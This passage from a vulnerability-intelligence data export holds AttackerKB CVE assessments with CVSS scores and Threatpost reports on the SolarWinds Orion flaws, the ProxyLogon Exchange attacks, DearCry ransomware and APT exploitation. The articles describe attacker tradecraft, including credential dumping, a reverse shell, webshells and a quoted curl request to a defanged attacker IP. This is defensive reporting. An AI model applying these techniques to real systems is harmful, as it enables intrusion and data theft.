JavaScript on untrusted websites via a plugin such as NoScript. Since most UAFs require JavaScript to be enabled to conduct exploitation, this will act as an effective mitigation in most cases, but users should not rely on this as their sole protection mechanism.\n\nIt is interesting to see that this is the third 0day exploited in the wild this year in Chrome, alongside CVE-2021-21166, an object lifecycle issue in the audio component, and CVE-2021-21148, a heap buffer overflow within the V8 scripting engine. 
Time will tell if this trend continues though, but it is interesting to see such a regular cadence of vulnerabilities being exploited in the wild.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-21193", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "modified": "2021-03-24T00:00:00", "id": "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "href": "https://attackerkb.com/topics/ACMmdhOpt2/cve-2021-21193", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-06T20:18:46", "description": "Acrobat Reader DC versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by a heap-based buffer overflow vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 30, 2021 10:13pm UTC reported:\n\nHeap-based buffer overflow used in \u201climited, targeted attacks\u201d according to Adobe\u2019s advisory: <https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>\n\n**NinjaOperator** at June 28, 2021 5:32pm UTC reported:\n\nHeap-based buffer overflow used in \u201climited, targeted attacks\u201d according to Adobe\u2019s advisory: <https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-21017", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21017"], "modified": "2021-02-12T00:00:00", "id": "AKB:A85EDE41-3F67-480B-8858-46B5D866EB51", "href": "https://attackerkb.com/topics/ysmVomBsUw/cve-2021-21017", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2022-11-19T15:23:32", "description": "Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability due to the way objects are handled in memory, aka \u201cMicrosoft Office Memory Corruption Vulnerability\u201d. This CVE is unique from CVE-2018-0797 and CVE-2018-0812.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-10T00:00:00", "type": "attackerkb", "title": "CVE-2018-0802", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0797", "CVE-2018-0802", "CVE-2018-0812"], "modified": "2021-07-27T00:00:00", "id": "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "href": "https://attackerkb.com/topics/e8I0KcDoDu/cve-2018-0802", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-29T20:35:00", "description": "Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.150 allowed a remote attacker to potentially exploit heap 
corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at February 05, 2021 4:25pm UTC reported:\n\nReported as exploited in the wild at <https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>. Several news articles such as <https://www.theverge.com/2021/2/5/22267872/chrome-88-zero-day-vulnerability-government-backed-hackers-security-researchers> have suggested that given the timing of this bug, and that it was reported one day before Google\u2019s report on the North Korea hackers targeting security researchers (see <https://www.theverge.com/2021/1/26/22250060/google-threat-analysis-group-north-korean-hackers-cybersecurity-researchers-social-engineering>), it may be related to the 0day Chrome bug that was used by North Korean state actors in that engagement.\n\nGiven this is a remote heap overflow in the browser there may be some concerns regarding reliability though and whilst I\u2019m sure there will be public exploits for this bug, I do question how reliable they will be given the nature of trying to exploit heap exploits. I would imagine the exploit would take advantage of JavaScript to craft the heap appropriately. Therefore a temporary, but not recommended, precaution may be to disable JavaScript in Chrome until one can apply this update.\n\nPlease note that Chrome will automatically apply the update if you open and close your browser. 
However people do tend to keep Chrome open with many tabs and then suspend their PC at the end of the day, so it\u2019s possible that these patches will likely see an uptick in application when the next Patch Tuesday or company wide patch cycle is enforced and people are forced to reboot their PCs to apply patches, and therefore restart Chrome.\n\nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-21148", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148"], "modified": "2021-02-13T00:00:00", "id": "AKB:B61D2687-96CE-4CE9-939F-9E35DA7814C4", "href": "https://attackerkb.com/topics/9stbF9rFqe/cve-2021-21148", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-02-03T22:38:15", "description": "Three serious vulnerabilities have been found in SolarWinds products: Two in the Orion User Device Tracker and one in the Serv-U FTP for Windows product. 
The most severe of these could allow trivial remote code execution with high privileges.\n\nThe SolarWinds Orion platform is the network management tool at the heart of [the recent espionage attack](<https://threatpost.com/mimecast-solarwinds-hack-security-vendor-victims/163431/>) against several U.S. government agencies, tech companies and other high-profile targets. It allows users to manage devices, software and firmware versioning, applications and so on, and has full visibility into enterprise customer networks.\n\nThese fresh vulnerabilities have not been shown to be used in the spy attack, but admins should nonetheless apply patches as soon as possible, according to Martin Rakhmanov, security research manager for SpiderLabs at Trustwave.\n\nTrustwave is not providing specific proof-of-concept (PoC) code until Feb. 9, in order to give SolarWinds users a longer time to patch, he noted in a Wednesday blog posting.\n\n## **Microsoft Messaging for SolarWinds Orion Takeover**\n\nThe most critical bug (CVE-2021-25274) does not require local access and allows complete control over SolarWinds Orion remotely without having any credentials at all.\n\nAs a part of the platform installation, there is a setup for Microsoft Messaging Queue (MSMQ), which is a two-decade-old technology that is no longer installed by default on modern Windows systems.\n\n\u201cImproper use of MSMQ could allow any remote unprivileged user the ability to execute any arbitrary code in the highest privilege,\u201d according to [Trustwave\u2019s advisory](<https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28389>), issued on Wednesday.\n\nRakhmanov said that it\u2019s possible for unauthenticated users to send messages to private queues over TCP port 1801.\n\n\u201cMy interest was piqued and I [also] jumped in to look at the code that handles incoming messages,\u201d he explained. 
\u201cUnfortunately, it turned out to be an unsafe deserialization victim. [This] allows remote code execution by remote, unprivileged users through combining those two issues. Given that the message processing code runs as a Windows service configured to use LocalSystem account, we have complete control of the underlying operating system.\u201d\n\n## **Info-Stealing from the Orion Database**\n\nThe second bug (CVE-2021-25275) was also found in the SolarWinds Orion framework. It allows unprivileged users who can log in locally or via Remote Desktop Protocol (RDP) to obtain a cleartext password for the backend database for the Orion platform, called SolarWindsOrionDatabaseUser \u2013 and from there set themselves up as an admin to steal information.\n\n\u201cSolarWinds credentials are stored in an insecure manner that could allow any local users, despite privileges, to take complete control over the SOLARWINDS_ORION database,\u201d according to Trustwave.\n\nPermissions are generously granted to all locally authenticated users, Rakhmanov found, and authenticated users can generally read database file content. He ran \u201ca simple grep\u201d (a Unix command used to search files for the occurrence of a string of characters that matches a specified pattern) across the files installed by the product to look for a configuration file, which he located.\n\nInside the config file were the Orion backend database credentials, albeit encrypted.\n\n\u201cI spent some time finding code that decrypts the password but essentially, it\u2019s a one-liner,\u201d he noted.\n\nOnce an unprivileged user runs the decrypting code, they can get a cleartext password for the SolarWindsOrionDatabaseUser.\n\n\u201cThe next step is to connect to the Microsoft SQL Server using the recovered account, and at this point, we have complete control over the SOLARWINDS_ORION database,\u201d Rakhmanov explained. 
\u201cFrom here, one can steal information or add a new admin-level user to be used inside SolarWinds Orion products.\u201d\n\n## **Adding Admin Users**\n\nThe third issue is a SolarWinds Serv-U FTP vulnerability (CVE-2021-25276). The product is used for secure transfer and large file-sharing.\n\nThe bug allows local privilege escalation so that an attacker gains the ability to read, write to or delete any file on the system.\n\n\u201cAny local user, regardless of privilege, can create a file that can define a new Serv-U FTP admin account with full access to the C:\\ drive,\u201d according to Trustwave. \u201cThis account can then be used to log in via FTP and read or replace any file on the drive.\u201d\n\nRakhmanov discovered that the platform\u2019s directory access control lists allow complete compromise by any authenticated Windows user.\n\n\u201cSpecifically, anyone who can log in locally or via Remote Desktop can just drop a file that defines a new user, and the Serv-U FTP will automatically pick it up,\u201d he explained. \u201cNext, since we can create any Serv-U FTP user, it makes sense to define an admin account by setting a simple field in the file and then set the home directory to the root of C:\\ drive.\u201d\n\nSolarWinds patches are available, in Orion Platform 2020.2.4 and ServU-FTP 15.2.2 Hotfix 1.\n\nRakhmanov did issue a caveat on the fix for the CVE-2021-25275 info-stealing bug.\n\n\u201cAfter the patch is applied, there is a digital signature validation step performed on arrived messages so that messages having no signature or not signed with a per-installation certificate are not further processed,\u201d he explained. 
\u201cOn the other hand, the MSMQ is still unauthenticated and allows anyone to send messages to it.\u201d\n", "cvss3": {}, "published": "2021-02-03T11:00:21", "type": "threatpost", "title": "SolarWinds Orion Bug Allows Easy Remote-Code Execution and Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276"], "modified": "2021-02-03T11:00:21", "id": "THREATPOST:9347B4A695C8250B35A5455A788D2D99", "href": "https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. 
The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) release leads us to believe the flaws are quite severe even if we don\u2019t know the full scope of those attacks,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nMicrosoft patched the following bugs this 
week, and admins should update accordingly:\n\n * **CVE-2021-26855** is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.\n * **CVE-2021-26857** is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.\n * **CVE-2021-26858** and **CVE-2021-27065** are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server \u2013 thus achieving remote code execution (RCE).\n\nResearchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, \u201cThis vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.\u201d\n\nThey also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.\n\nIn addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.\n\n\u201cBased on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user\u2019s mailbox,\u201d said Tenable\u2019s Narang. 
\u201cThe other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization\u2019s network.\u201d\n\n## **What Happened in the Hafnium Attacks?**\n\nIn the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.\n\n\u201cIn all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,\u201d according to [Volexity\u2019s writeup](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>).\n\nFollowing web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory;\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration;\n * Adding and using Exchange PowerShell snap-ins to export mailbox data;\n * Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;\n * And downloading PowerCat from GitHub, then using it to open a connection to a remote server.\n\nThe attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.\n\n\u201cThe good news for defenders is that the post-exploitation activity is very detectable,\u201d said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. 
\u201cSome of the activity we observed uses [the China Chopper web shell](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), which has been around for more than eight years, giving defenders ample time to develop detection logic for it.\u201d\n\n## **Who is the Hafnium APT?**\n\nHafnium has been tracked by Microsoft before, but the company has [only just released a few details](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) on the APT.\n\nIn terms of its tactics, \u201cHafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,\u201d according to Microsoft. \u201cOnce they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.\u201d\n\nHafnium operates primarily from leased virtual private servers in the United States, and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. 
It characterizes the APT as \u201ca highly skilled and sophisticated actor.\u201d\n\n## **Time to Patch: Expect More Attacks Soon**\n\nIt should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.\n\n\u201cWe expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,\u201d he added.\n\nAnd indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers (with antivirus and endpoint detection/recovery installed) and expect this number to keep rising.\n\nThey\u2019re not alone.\n\n\u201cFireEye has observed these vulnerabilities being exploited in the wild and we are actively working with several impacted organizations,\u201d Charles Carmakal, senior vice president and CTO at FireEye Mandiant, said via email. \u201cIn addition to patching as soon as possible, we recommend organizations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.\u201d\n", "cvss3": {}, "published": "2021-03-03T15:30:52", "type": "threatpost", "title": "Microsoft Exchange 0-Day Attackers Spy on U.S. 
Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T15:30:52", "id": "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "href": "https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-16T14:17:03", "description": "Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.\n\nThe ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft [issued emergency patches in early March](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) for four Microsoft Exchange flaws. The flaws [can be chained together](<https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/>) to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials.\n\nThe flaws give attackers the opportunity to install a webshell for further exploitation within the environment \u2014 and now, researchers say attackers are downloading the new ransomware strain (a.k.a. 
Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.\n\n\u201cWe have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,\u201d Microsoft said [on Twitter](<https://twitter.com/MsftSecIntel/status/1370236539427459076>), Thursday.\n\n## **DearCry Ransomware**\n\nDearCry first came onto the infosec space\u2019s radar after ransomware expert Michael Gillespie [on Thursday said he observed](<https://twitter.com/demonslay335/status/1370125343571509250>) a \u201csudden swarm\u201d of submissions to his ransomware identification website, ID-Ransomware.\n\nThe ransomware uses the extension \u201c.CRYPT\u201d when encrypting files, as well as a filemarker \u201cDEARCRY!\u201d in the string for each encrypted file.\n\n[Microsoft later confirmed](<https://twitter.com/phillip_misner/status/1370197696280027136>) that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nAccording to a [report by BleepingComputer](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/amp/>), the ransomware drops a ransom note (called \u2018readme.txt\u2019) after initially infecting the victim \u2013 which contains two email addresses for the threat actors and demands a ransom payment of $16,000.\n\nMeanwhile, [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1370130753586102272>) on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S. 
On Twitter, MalwareHunterTeam said the ransomware is \u201cnot that very widespread (yet?).\u201d Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which [can be found here](<https://twitter.com/malwrhunterteam/status/1370271414855593986>)).\n\n## **Microsoft Exchange Attacks Doubling Every Hour**\n\nExploitation activity for the recently patched Exchange flaws continues to skyrocket, [with researchers this week warning](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.\n\n[New research by Check Point Software](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) said in the past 24 hours alone, the number of exploitation attempts on organizations has doubled every two to three hours.\n\nResearchers said they saw hundreds of exploit attempts against organizations worldwide \u2013 with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).\n\nResearchers warned that exploitation activity will continue \u2014 and urged companies that have not already done so to patch.\n\n\u201cSince the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,\u201d according to Check Point researchers. 
\u201cGlobal experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.\u201d\n", "cvss3": {}, "published": "2021-03-12T16:26:07", "type": "threatpost", "title": "Microsoft Exchange Exploits Pave a Ransomware Path", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-12T16:26:07", "id": "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "href": "https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-11T21:58:44", "description": "Recently patched Microsoft Exchange vulnerabilities are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world. Overall exploitation activity is snowballing, according to researchers.\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. 
Four flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a webshell for further exploitation within the environment.\n\nAnd indeed, adversaries from the Chinese APT known as Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nMicrosoft was spurred to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) for the exploited bugs, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\n## **Rapidly Spreading Email Server Attacks**\n\nMicrosoft said last week that the attacks were \u201climited and targeted.\u201d But that\u2019s certainly no longer the case. Other security companies have [continued to say](<https://twitter.com/0xDUDE/status/1369302347617349642>) they have seen much broader, escalating activity with mass numbers of servers being scanned and attacked.\n\nESET researchers [had confirmed this](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as well, and on Wednesday announced that it had pinpointed at least 10 APTs going after the bugs, including Calypso, LuckyMouse, Tick and Winnti Group.\n\n\u201cOn Feb. 28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by LuckyMouse, Calypso and the Winnti Group,\u201d according to [the writeup](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>). 
\u201cThis suggests that multiple threat actors gained access to the details of the vulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by reverse-engineering Microsoft updates.\u201d\n\n> The [@DIVDnl](<https://twitter.com/DIVDnl?ref_src=twsrc%5Etfw>) scanned over 250K Exchange servers. Sent over 46k emails to the owners. The amount of vulnerable servers is going down. The number of compromised systems is going up. More organizations start investigating their systems for [#Hafnium](<https://twitter.com/hashtag/Hafnium?src=hash&ref_src=twsrc%5Etfw>) exploits.<https://t.co/XmQhHd7OA9>\n> \n> \u2014 Victor Gevers (@0xDUDE) [March 9, 2021](<https://twitter.com/0xDUDE/status/1369302347617349642?ref_src=twsrc%5Etfw>)\n\nThis activity was quickly followed by a raft of other groups, including CactusPete and Mikroceen \u201cscanning and compromising Exchange servers en masse,\u201d according to ESET.\n\n\u201cWe have already detected webshells on more than 5,000 email servers [in more than 115 countries] as of the time of writing, and according to public sources, [several important organizations](<https://twitter.com/sundhaug92/status/1369669037924483087>), such as the European Banking Authority, suffered from this attack,\u201d according to the ESET report.\n\nIt also appears that threat groups are piggybacking on each other\u2019s work. For instance, in some cases the webshells were dropped into Offline Address Book (OAB) configuration files, and they appeared to be accessed by more than one group.\n\n\u201cWe cannot discount the possibility that some threat actors might have hijacked the webshells dropped by other groups rather than directly using the exploit,\u201d said ESET researchers. \u201cOnce the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware through it. 
We also noticed in some cases that several threat actors were targeting the same organization.\u201d\n\n## **Zero-Day Activity Targeting Microsoft Exchange Bugs**\n\nESET has documented a raft of activity targeting the four vulnerabilities, including multiple zero-day compromises before Microsoft rolled patches out.\n\nFor instance, Tick, which has been infiltrating organizations primarily in Japan and South Korea since 2008, was seen compromising the webserver of an IT company based in East Asia two days before Microsoft released its patches for the Exchange flaws.\n\n\u201cWe then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group,\u201d ESET researchers said. \u201cIts main objective seems to be intellectual property and classified information theft.\u201d\n\n\n\nA timeline of ProxyLogon activity. Source: ESET.\n\nOne day before the patches were released, LuckyMouse (a.k.a. APT27 or Emissary Panda) compromised the email server of a governmental entity in the Middle East, ESET observed. The group is cyberespionage-focused and is known for breaching multiple government networks in Central Asia and the Middle East, along with transnational organizations like the International Civil Aviation Organization (ICAO) in 2016.\n\n\u201cLuckyMouse operators started by dropping the Nbtscan tool in C:\\programdata\\, then installed a variant of the ReGeorg webshell and issued a GET request to http://34.90.207[.]23/ip using curl,\u201d according to ESET\u2019s report. \u201cFinally, they attempted to install their SysUpdate (a.k.a. Soldier) modular backdoor.\u201d\n\nThat same day, still in the zero-day period, the Calypso spy group compromised the email servers of governmental entities in the Middle East and in South America. 
And in the following days, it targeted additional servers at governmental entities and private companies in Africa, Asia and Europe using the exploit.\n\n\u201cAs part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group (Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report),\u201d according to ESET. \u201cThese tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers).\u201d\n\nESET also observed the Winnti Group exploiting the bugs, a few hours before Microsoft released the patches. Winnti (a.k.a. APT41 or Barium, known for [high-profile supply-chain attacks against the video game and software industries](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>)) compromised the email servers of an oil company and a construction equipment company, both based in East Asia.\n\n\u201cThe attackers started by dropping webshells,\u201d according to ESET. \u201cAt one of the compromised victims we observed a [PlugX RAT](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) sample (also known as Korplug)\u2026at the second victim, we observed a loader that is 